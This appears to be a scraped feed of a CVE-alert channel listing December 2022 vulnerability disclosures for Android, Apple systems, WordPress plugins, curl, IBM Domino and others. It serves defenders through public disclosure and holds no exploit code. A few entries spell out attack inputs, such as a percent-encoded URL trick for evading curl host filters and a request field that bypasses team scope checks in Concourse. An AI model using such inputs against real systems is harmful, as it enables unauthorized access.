🚨 CVE-2022-20504In multiple locations of DreamManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and dismissal of system dialogs with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-225878553🎖@cveNotify |
|
| 2022-12-20 19:29:46 |
🚨 CVE-2022-20503In onCreate of WifiDppConfiguratorActivity.java, there is a possible way for a guest user to add a WiFi configuration due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224772890🎖@cveNotify |
|
| 2022-12-20 19:29:45 |
🚨 CVE-2022-46689A race condition was addressed with additional validation. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2022-12-20 19:29:41 |
🚨 CVE-2022-46076D-Link DIR-869 DIR869Ax_FW102B15 is vulnerable to Authentication Bypass via phpcgi.🎖@cveNotify |
|
| 2022-12-20 19:29:40 |
🚨 CVE-2022-46702The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.🎖@cveNotify |
|
| 2022-12-20 19:29:39 |
🚨 CVE-2022-4519The WP User plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2022-12-20 19:29:38 |
🚨 CVE-2021-33420A deserialization issue discovered in inikulin replicator before 1.0.4 allows remote attackers to run arbitrary code via the fromSerializable function in TypedArray object.🎖@cveNotify |
|
| 2022-12-20 19:29:37 |
🚨 CVE-2022-42859Multiple issues were addressed by removing the vulnerable code. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, watchOS 9.2. An app may be able to bypass Privacy preferences.🎖@cveNotify |
|
| 2022-12-20 17:29:45 |
🚨 CVE-2022-46542Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/addressNat.🎖@cveNotify |
|
| 2022-12-20 14:29:38 |
🚨 CVE-2022-46421Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0.🎖@cveNotify |
|
| 2022-12-20 12:29:44 |
🚨 CVE-2022-3369An Improper Access Control vulnerability in the bdservicehost.exe component, as used in Bitdefender Engines for Windows, allows an attacker to delete privileged registry keys by pointing a Registry symlink to a privileged key. This issue affects: Bitdefender Engines versions prior to 7.92659. It also affects Bitdefender Antivirus Free, Bitdefender Antivirus Plus, Bitdefender Internet Security, Bitdefender Total Security, as well as Bitdefender Endpoint Security Tools for Windows with engine versions prior to 7.92659.🎖@cveNotify |
|
| 2022-12-20 12:29:43 |
🚨 CVE-2021-3485An Improper Input Validation vulnerability in the Product Update feature of Bitdefender Endpoint Security Tools for Linux allows a man-in-the-middle attacker to abuse the DownloadFile function of the Product Update to achieve remote code execution. This issue affects: Bitdefender Endpoint Security Tools for Linux versions prior to 6.2.21.155.🎖@cveNotify |
|
| 2022-12-20 12:29:39 |
🚨 CVE-2021-31843Improper privileges management vulnerability in McAfee Endpoint Security (ENS) Windows prior to 10.7.0 September 2021 Update allows local users to access files which they would otherwise not have access to via manipulating junction links to redirect McAfee folder operations to an unintended location.🎖@cveNotify |
|
| 2022-12-20 12:29:38 |
🚨 CVE-2021-23892By exploiting a time of check to time of use (TOCTOU) race condition during the Endpoint Security for Linux Threat Prevention and Firewall (ENSL TP/FW) installation process, a local user can perform a privilege escalation attack to obtain administrator privileges for the purpose of executing arbitrary code through insecure use of predictable temporary file locations.🎖@cveNotify |
|
| 2022-12-20 12:29:37 |
🚨 CVE-2020-7346Privilege Escalation vulnerability in McAfee Data Loss Prevention (DLP) for Windows prior to 11.6.100 allows a local, low privileged, attacker through the use of junctions to cause the product to load DLLs of the attacker's choosing. This requires the creation and removal of junctions by the attacker along with sending a specific IOTL command at the correct time.🎖@cveNotify |
|
| 2022-12-20 06:29:45 |
🚨 CVE-2022-45033A cross-site scripting (XSS) vulnerability in Expense Tracker 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Chat text field.🎖@cveNotify |
|
| 2022-12-20 06:29:44 |
🚨 CVE-2022-42845The issue was addressed with improved memory handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app with root privileges may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2022-12-20 06:29:43 |
🚨 CVE-2022-44109pdftojson commit 94204bb was discovered to contain a stack overflow via the component Stream::makeFilter(char*, Stream*, Object*, int).🎖@cveNotify |
|
| 2022-12-20 06:29:39 |
🚨 CVE-2022-46399The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) is unresponsive with ConReqTimeoutZero.🎖@cveNotify |
|
| 2022-12-20 06:29:38 |
🚨 CVE-2022-46402The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) accepts PairCon_rmSend with incorrect values.🎖@cveNotify |
|
| 2022-12-20 06:29:37 |
🚨 CVE-2022-46403The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) mishandles reject messages.🎖@cveNotify |
|
| 2022-12-20 02:29:45 |
🚨 CVE-2022-47551Apiman 1.5.7 through 2.2.3.Final has insufficient checks for read permissions within the Apiman Manager REST API. The root cause of the issue is the Apiman project's accidental acceptance of a large contribution that was not fully compatible with the security model of Apiman versions before 3.0.0.Final. Because of this, 3.0.0.Final is not affected by the vulnerability.🎖@cveNotify |
|
| 2022-12-20 02:29:44 |
🚨 CVE-2022-3752An unauthorized user could use a specially crafted sequence of Ethernet/IP messages, combined with heavy traffic load to cause a denial-of-service condition resulting in a denial-of-service condition. If the target device becomes unavailable, a user would have to clear the fault and redownload the user project file to bring the device back online and continue normal operation.🎖@cveNotify |
|
| 2022-12-20 02:29:43 |
🚨 CVE-2022-44109pdftojson commit 94204bb was discovered to contain a stack overflow via the component Stream::makeFilter(char*, Stream*, Object*, int).🎖@cveNotify |
|
| 2022-12-20 02:29:39 |
🚨 CVE-2022-46399The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) is unresponsive with ConReqTimeoutZero.🎖@cveNotify |
|
| 2022-12-20 02:29:38 |
🚨 CVE-2022-46400The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) allows attackers to bypass passkey entry in legacy pairing.🎖@cveNotify |
|
| 2022-12-20 02:29:37 |
🚨 CVE-2022-46401The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) accepts PauseEncReqPlainText before pairing is complete.🎖@cveNotify |
|
| 2022-12-20 02:29:36 |
🚨 CVE-2022-46403The Microchip RN4870 module firmware 1.43 (and the Microchip PIC LightBlue Explorer Demo 4.2 DT100112) mishandles reject messages.🎖@cveNotify |
|
| 2022-12-19 18:30:02 |
🚨 CVE-2022-31683Concourse (7.x.y prior to 7.8.3 and 6.x.y prior to 6.7.9) contains an authorization bypass issue. A Concourse user can send a request with body including :team_name=team2 to bypass team scope check to gain access to certain resources belong to any other team.🎖@cveNotify |
|
| 2022-12-19 18:30:01 |
🚨 CVE-2022-42945DWG TrueViewTM 2023 version has a DLL Search Order Hijacking vulnerability. Successful exploitation by a malicious attacker could result in remote code execution on the target system.🎖@cveNotify |
|
| 2022-12-19 18:30:00 |
🚨 CVE-2022-42946Parsing a maliciously crafted X_B and PRT file can force Autodesk Maya 2023 to read beyond allocated buffer. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2022-12-19 18:29:59 |
🚨 CVE-2022-42947A maliciously crafted X_B file when parsed through Autodesk Maya 2023 can be used to write beyond the allocated buffer. This vulnerability can lead to arbitrary code execution.🎖@cveNotify |
|
| 2022-12-19 18:29:58 |
🚨 CVE-2022-47512Sensitive information was stored in plain text in a file that is accessible by a user with a local account in Hybrid Cloud Observability (HCO)/ SolarWinds Platform 2022.4. No other versions are affected🎖@cveNotify |
|
| 2022-12-19 18:29:57 |
🚨 CVE-2022-44699Azure Network Watcher Agent Security Feature Bypass Vulnerability.🎖@cveNotify |
|
| 2022-12-19 18:29:56 |
🚨 CVE-2020-21219Cross Site Scripting (XSS) vulnerability in Netgate pf Sense 2.4.4-Release-p3 and Netgate ACME package 0.6.3 allows remote attackers to to run arbitrary code via the RootFolder field to acme_certificate_edit.php page of the ACME package.🎖@cveNotify |
|
| 2022-12-19 18:29:54 |
🚨 CVE-2022-4455A vulnerability, which was classified as problematic, was found in sproctor php-calendar. This affects an unknown part of the file index.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is a2941109b42201c19733127ced763e270a357809. It is recommended to apply a patch to fix this issue. The identifier VDB-215445 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-19 18:29:53 |
🚨 CVE-2022-4454A vulnerability, which was classified as critical, has been found in m0ver bible-online. Affected by this issue is the function query of the file src/main/java/custom/application/search.java of the component Search Handler. The manipulation leads to sql injection. The name of the patch is 6ef0aabfb2d4ccd53fcaa9707781303af357410e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215444.🎖@cveNotify |
|
| 2022-12-19 18:29:52 |
🚨 CVE-2019-25078A vulnerability classified as problematic was found in pacparser up to 1.3.x. Affected by this vulnerability is the function pacparser_find_proxy of the file src/pacparser.c. The manipulation of the argument url leads to buffer overflow. Attacking locally is a requirement. Upgrading to version 1.4.0 is able to address this issue. The name of the patch is 853e8f45607cb07b877ffd270c63dbcdd5201ad9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215443.🎖@cveNotify |
|
| 2022-12-19 18:29:51 |
🚨 CVE-2022-40002Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbirtary code via the callback parameter to /cms/notify.🎖@cveNotify |
|
| 2022-12-19 18:29:50 |
🚨 CVE-2022-40373Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.1.1 allows remote attackers to run arbitrary code via upload of crafted XML file.🎖@cveNotify |
|
| 2022-12-19 18:29:49 |
🚨 CVE-2022-40000Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the username field of the admin log in page.🎖@cveNotify |
|
| 2022-12-19 18:29:48 |
🚨 CVE-2022-40001Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the title field of the create article page.🎖@cveNotify |
|
| 2022-12-19 18:29:47 |
🚨 CVE-2021-39428Cross Site Scripting (XSS) vulnerability in Users.php in eyoucms 1.5.4 allows remote attackers to run arbitrary code and gain escalated privilege via the filename for edit_users_head_pic.🎖@cveNotify |
|
| 2022-12-19 18:29:45 |
🚨 CVE-2021-39427Cross site scripting vulnerability in 188Jianzhan 2.10 allows attackers to execute arbitrary code via the username parameter to /admin/reg.php.🎖@cveNotify |
|
| 2022-12-19 18:29:44 |
🚨 CVE-2019-20180The TablePress plugin 1.9.2 for WordPress allows tablepress[data] CSV injection by Editor users.🎖@cveNotify |
|
| 2022-12-19 18:29:43 |
🚨 CVE-2022-4456A vulnerability has been found in falling-fruit and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 15adb8e1ea1f1c3e3d152fc266071f621ef0c621. It is recommended to apply a patch to fix this issue. VDB-215446 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-19 18:29:42 |
🚨 CVE-2022-31705VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.🎖@cveNotify |
|
| 2022-12-19 18:29:41 |
🚨 CVE-2022-47406An issue was discovered in the fe_change_pwd (aka Change password for frontend users) extension before 2.0.5, and 3.x before 3.0.3, for TYPO3. The extension fails to revoke existing sessions for the current user when the password has been changed.🎖@cveNotify |
|
| 2022-12-19 16:29:56 |
🚨 CVE-2021-36572Cross Site Scripting (XSS) vulnerability in Feehi CMS thru 2.1.1 allows attackers to run arbitrary code via the user name field of the login page.🎖@cveNotify |
|
| 2022-12-19 16:29:55 |
🚨 CVE-2022-32763A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2022-12-19 16:29:54 |
🚨 CVE-2021-4261A vulnerability classified as critical has been found in pacman-canvas up to 1.0.5. Affected is the function addHighscore of the file data/db-handler.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. Upgrading to version 1.0.6 is able to address this issue. The name of the patch is 29522c90ca1cebfce6453a5af5a45281d99b0646. It is recommended to upgrade the affected component. VDB-216270 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-19 16:29:50 |
🚨 CVE-2022-3832The External Media WordPress plugin before 1.0.36 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-19 16:29:49 |
🚨 CVE-2022-3961The Directorist WordPress plugin before 7.4.4 does not prevent users with low privileges (like subscribers) from accessing sensitive system information.🎖@cveNotify |
|
| 2022-12-19 16:29:48 |
🚨 CVE-2022-3984The Flowplayer Video Player WordPress plugin before 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2022-12-19 16:29:44 |
🚨 CVE-2022-3985The Videojs HTML5 Player WordPress plugin before 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2022-12-19 16:29:43 |
🚨 CVE-2022-3987The Responsive Lightbox2 WordPress plugin before 1.0.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2022-12-19 16:29:42 |
🚨 CVE-2022-4050The JoomSport WordPress plugin before 5.2.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users🎖@cveNotify |
|
| 2022-12-19 16:29:38 |
🚨 CVE-2022-4058The Photo Gallery by 10Web WordPress plugin before 1.8.3 does not validate and escape some parameters before outputting them back in in JS code later on in another page, which could lead to Stored XSS issue when an attacker makes a logged in admin open a malicious URL or page under their control.🎖@cveNotify |
|
| 2022-12-19 16:29:37 |
🚨 CVE-2022-4063The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers.🎖@cveNotify |
|
| 2022-12-19 16:29:36 |
🚨 CVE-2022-4107The SMSA Shipping for WooCommerce WordPress plugin before 1.0.5 does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server🎖@cveNotify |
|
| 2022-12-19 14:30:01 |
🚨 CVE-2022-40743Improper Input Validation vulnerability for the xdebug plugin in Apache Software Foundation Apache Traffic Server can lead to cross site scripting and cache poisoning attacks.This issue affects Apache Traffic Server: 9.0.0 to 9.1.3. Users should upgrade to 9.1.4 or later versions.🎖@cveNotify |
|
| 2022-12-19 14:30:00 |
🚨 CVE-2022-4609Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.🎖@cveNotify |
|
| 2022-12-19 14:29:59 |
🚨 CVE-2022-38659In specific scenarios, on Windows the operator credentials may be encrypted in a manner that is not completely machine-dependent.🎖@cveNotify |
|
| 2022-12-19 14:29:55 |
🚨 CVE-2022-38662In HCL Digital Experience, URLs can be constructed to redirect users to untrusted sites.🎖@cveNotify |
|
| 2022-12-19 14:29:54 |
🚨 CVE-2022-3876A vulnerability, which was classified as problematic, has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. This issue affects some unknown processing of the file /api/browserextension/UpdatePassword/ of the component API. The manipulation of the argument PasswordID leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-216245 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-19 14:29:53 |
🚨 CVE-2022-42453There are insufficient warnings when a Fixlet is imported by a user. The warning message currently assumes the owner of the script is the logged in user, with insufficient warnings when attempting to run the script.🎖@cveNotify |
|
| 2022-12-19 14:29:49 |
🚨 CVE-2022-44750IBM Domino is susceptible to a stack based buffer overflow vulnerability in lasr.dll in Micro Focus KeyView. This could allow a remote unauthenticated attacker to crash the application or execute arbitrary code via a crafted Lotus Ami Pro file. This is different from the vulnerability described in CVE-2022-44754.🎖@cveNotify |
|
| 2022-12-19 14:29:48 |
🚨 CVE-2022-44752IBM Domino is susceptible to a stack based buffer overflow vulnerability in wp6sr.dll in Micro Focus KeyView. This could allow a remote unauthenticated attacker to crash the application or execute arbitrary code via a crafted WordPerfect file.🎖@cveNotify |
|
| 2022-12-19 14:29:47 |
🚨 CVE-2022-44753IBM Notes is susceptible to a stack based buffer overflow vulnerability in wp6sr.dll in Micro Focus KeyView. This could allow a remote unauthenticated attacker to crash the application or execute arbitrary code via a crafted WordPerfect file.🎖@cveNotify |
|
| 2022-12-19 14:29:46 |
🚨 CVE-2022-44754IBM Domino is susceptible to a stack based buffer overflow vulnerability in lasr.dll in Micro Focus KeyView. This could allow a remote unauthenticated attacker to crash the application or execute arbitrary code via a crafted Lotus Ami Pro file. This is different from the vulnerability described in CVE-2022-44750.🎖@cveNotify |
|
| 2022-12-19 14:29:43 |
🚨 CVE-2022-44755IBM Notes is susceptible to a stack based buffer overflow vulnerability in lasr.dll in Micro Focus KeyView. This could allow a remote unauthenticated attacker to crash the application or execute arbitrary code via a crafted Lotus Ami Pro file. This is different from the vulnerability described in CVE-2022-44751.🎖@cveNotify |
|
| 2022-12-19 14:29:42 |
🚨 CVE-2022-32749Improper Check for Unusual or Exceptional Conditions vulnerability handling requests in Apache Traffic Server allows an attacker to crash the server under certain conditions. This issue affects Apache Traffic Server: from 8.0.0 through 9.1.3.🎖@cveNotify |
|
| 2022-12-19 14:29:41 |
🚨 CVE-2022-1471SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.🎖@cveNotify |
|
| 2022-12-19 12:29:45 |
🚨 CVE-2016-20018Knex Knex.js through 2.3.0 has a limited SQL injection vulnerability that can be exploited to ignore the WHERE clause of a SQL query.🎖@cveNotify |
|
| 2022-12-19 12:29:44 |
🚨 CVE-2022-47549An unprotected memory-access operation in optee_os in TrustedFirmware Open Portable Trusted Execution Environment (OP-TEE) before 3.20 allows a physically proximate adversary to bypass signature verification and install malicious trusted applications via electromagnetic fault injections.🎖@cveNotify |
|
| 2022-12-19 12:29:43 |
🚨 CVE-2022-4427Improper Input Validation vulnerability in OTRS AG OTRS, OTRS AG ((OTRS)) Community Edition allows SQL Injection via TicketSearch Webservice This issue affects OTRS: from 7.0.1 before 7.0.40 Patch 1, from 8.0.1 before 8.0.28 Patch 1; ((OTRS)) Community Edition: from 6.0.1 through 6.0.34.🎖@cveNotify |
|
| 2022-12-19 07:30:11 |
🚨 CVE-2022-27775An information disclosure vulnerability exists in curl 7.65.0 to 7.82.0 are vulnerable that by using an IPv6 address that was in the connection pool but with a different zone id it could reuse a connection instead.🎖@cveNotify |
|
| 2022-12-19 07:30:05 |
🚨 CVE-2022-27779libcurl wrongly allows cookies to be set for Top Level Domains (TLDs) if thehost name is provided with a trailing dot.curl can be told to receive and send cookies. curl's "cookie engine" can bebuilt with or without [Public Suffix List](https://publicsuffix.org/)awareness. If PSL support not provided, a more rudimentary check exists to atleast prevent cookies from being set on TLDs. This check was broken if thehost name in the URL uses a trailing dot.This can allow arbitrary sites to set cookies that then would get sent to adifferent and unrelated site or domain.🎖@cveNotify |
|
| 2022-12-19 07:30:01 |
🚨 CVE-2022-27781libcurl provides the `CURLOPT_CERTINFO` option to allow applications torequest details to be returned about a server's certificate chain.Due to an erroneous function, a malicious server could make libcurl built withNSS get stuck in a never-ending busy-loop when trying to retrieve thatinformation.🎖@cveNotify |
|
| 2022-12-19 07:29:57 |
🚨 CVE-2022-27780The curl URL parser wrongly accepts percent-encoded URL separators like '/'when decoding the host name part of a URL, making it a *different* URL usingthe wrong host name when it is later retrieved.For example, a URL like `http://example.com%2F127.0.0.1/`, would be allowed bythe parser and get transposed into `http://example.com/127.0.0.1/`. This flawcan be used to circumvent filters, checks and more.🎖@cveNotify |
|
| 2022-12-19 07:29:55 |
🚨 CVE-2022-30115Using its HSTS support, curl can be instructed to use HTTPS directly insteadof using an insecure clear-text HTTP step even when HTTP is provided in theURL. This mechanism could be bypassed if the host name in the given URL used atrailing dot while not using one when it built the HSTS cache. Or the otherway around - by having the trailing dot in the HSTS cache and *not* using thetrailing dot in the URL.🎖@cveNotify |
|
| 2022-12-19 07:29:52 |
🚨 CVE-2022-27774An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.🎖@cveNotify |
|
| 2022-12-19 07:29:46 |
🚨 CVE-2022-27776A insufficiently protected credentials vulnerability in fixed in curl 7.83.0 might leak authentication or cookie header data on HTTP redirects to the same host but another port number.🎖@cveNotify |
|
| 2022-12-18 23:29:44 |
🚨 CVE-2021-4252A vulnerability, which was classified as problematic, has been found in WP-Ban. This issue affects the function toggle_checkbox of the file ban-options.php. The manipulation of the argument $_SERVER["HTTP_USER_AGENT"] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 13e0b1e922f3aaa3f8fcb1dd6d50200dd693fd76. It is recommended to apply a patch to fix this issue. The identifier VDB-216209 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-18 23:29:43 |
🚨 CVE-2021-4254A vulnerability has been found in ctrlo lenio and classified as problematic. Affected by this vulnerability is an unknown functionality of the file views/layouts/main.tt of the component Notice Handler. The manipulation of the argument notice.notice.text leads to cross site scripting. The attack can be launched remotely. The name of the patch is aa300555343c1c081951fcb68bfb6852fbba7451. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216211.🎖@cveNotify |
|
| 2022-12-18 23:29:42 |
🚨 CVE-2021-4255A vulnerability was found in ctrlo lenio and classified as problematic. Affected by this issue is some unknown functionality of the file views/contractor.tt. The manipulation of the argument contractor.name leads to cross site scripting. The attack may be launched remotely. The name of the patch is e1646d5cd0a2fbab9eb505196dd2ca1c9e4cdd97. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216212.🎖@cveNotify |
|
| 2022-12-18 23:29:41 |
🚨 CVE-2021-4256A vulnerability was found in ctrlo lenio. It has been classified as problematic. This affects an unknown part of the file views/index.tt. The manipulation of the argument task.name/task.site.org.name leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is e1646d5cd0a2fbab9eb505196dd2ca1c9e4cdd97. It is recommended to apply a patch to fix this issue. The identifier VDB-216213 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-18 23:29:40 |
🚨 CVE-2021-4257A vulnerability was found in ctrlo lenio. It has been declared as problematic. This vulnerability affects unknown code of the file views/task.tt of the component Task Handler. The manipulation of the argument site.org.name/check.name/task.tasktype.name/task.name leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 698c5fa465169d6f23c6a41ca4b1fc9a7869013a. It is recommended to apply a patch to fix this issue. VDB-216214 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-18 23:29:39 |
🚨 CVE-2022-4607A vulnerability was found in 3D City Database OGC Web Feature Service up to 5.2.1. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to xml external entity reference. Upgrading to version 5.3.0 is able to address this issue. The name of the patch is 246f4e2a97ad81491c00a7ed72ce5e7c7f75050a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216215.🎖@cveNotify |
|
| 2022-12-18 23:29:38 |
🚨 CVE-2021-4250A vulnerability classified as problematic has been found in cgriego active_attr up to 0.15.3. This affects the function call of the file lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler. The manipulation of the argument value leads to denial of service. The exploit has been disclosed to the public and may be used. Upgrading to version 0.15.4 is able to address this issue. The name of the patch is dab95e5843b01525444b82bd7b336ef1d79377df. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216207.🎖@cveNotify |
|
| 2022-12-18 23:29:37 |
🚨 CVE-2021-4251A vulnerability classified as problematic was found in as. This vulnerability affects the function getFullURL of the file include.cdn.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 4acad1e3d2c34c017473ceea442fb3e3e078b2bd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216208.🎖@cveNotify |
|
| 2022-12-18 23:29:36 |
🚨 CVE-2021-4253A vulnerability, which was classified as problematic, was found in ctrlo lenio. Affected is an unknown function in the library lib/Lenio.pm of the component Ticket Handler. The manipulation of the argument site_id leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 7a1f90bd2a0ce95b8338ec0926902da975ec64d9. It is recommended to apply a patch to fix this issue. VDB-216210 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-18 18:29:37 |
🚨 CVE-2020-36617** DISPUTED ** A vulnerability was found in ewxrjk sftpserver. It has been declared as problematic. Affected by this vulnerability is the function sftp_parse_path of the file parse.c. The manipulation leads to uninitialized pointer. The real existence of this vulnerability is still doubted at the moment. The name of the patch is bf4032f34832ee11d79aa60a226cc018e7ec5eed. It is recommended to apply a patch to fix this issue. The identifier VDB-216205 was assigned to this vulnerability. NOTE: In some deployment models this would be a vulnerability. README specifically warns about avoiding such deployment models.🎖@cveNotify |
|
| 2022-12-18 18:29:36 |
🚨 CVE-2021-4249A vulnerability was found in xml-conduit. It has been classified as problematic. Affected is an unknown function of the file xml-conduit/src/Text/XML/Stream/Parse.hs of the component DOCTYPE Entity Expansion Handler. The manipulation leads to infinite loop. It is possible to launch the attack remotely. Upgrading to version 1.9.1.0 is able to address this issue. The name of the patch is 4be1021791dcdee8b164d239433a2043dc0939ea. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216204.🎖@cveNotify |
|
| 2022-12-18 16:29:49 |
🚨 CVE-2022-4605Cross-site Scripting (XSS) - Stored in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2022-12-18 16:29:47 |
🚨 CVE-2022-4606PHP Remote File Inclusion in GitHub repository flatpressblog/flatpress prior to 1.3.🎖@cveNotify |
|
| 2022-12-18 14:29:56 |
🚨 CVE-2021-4247A vulnerability has been found in OWASP NodeGoat and classified as problematic. This vulnerability affects unknown code of the file app/routes/research.js of the component Query Parameter Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The name of the patch is 4a4d1db74c63fb4ff8d366551c3af006c25ead12. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216184.🎖@cveNotify |
|
| 2022-12-18 14:29:55 |
🚨 CVE-2022-4593A vulnerability was found in retra-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is a6d94ab88f4a6f631a14c59b72461140fb57ae1f. It is recommended to apply a patch to fix this issue. VDB-216186 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-18 14:29:54 |
🚨 CVE-2022-4594A vulnerability was found in drogatkin TJWS2. It has been declared as critical. Affected by this vulnerability is the function deployWar of the file 1.x/src/rogatkin/web/WarRoller.java. The manipulation leads to path traversal. The attack can be launched remotely. The name of the patch is 1bac15c496ec54efe21ad7fab4e17633778582fc. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216187.🎖@cveNotify |
|
| 2022-12-18 14:29:50 |
🚨 CVE-2022-47519An issue was discovered in the Linux kernel before 6.0.11. Missing validation of IEEE80211_P2P_ATTR_OPER_CHANNEL in drivers/net/wireless/microchip/wilc1000/cfg80211.c in the WILC1000 wireless driver can trigger an out-of-bounds write when parsing the channel list attribute from Wi-Fi management frames.🎖@cveNotify |
|
| 2022-12-18 14:29:49 |
🚨 CVE-2022-47521An issue was discovered in the Linux kernel before 6.0.11. Missing validation of IEEE80211_P2P_ATTR_CHANNEL_LIST in drivers/net/wireless/microchip/wilc1000/cfg80211.c in the WILC1000 wireless driver can trigger a heap-based buffer overflow when parsing the operating channel attribute from Wi-Fi management frames.🎖@cveNotify |
|
| 2022-12-18 14:29:48 |
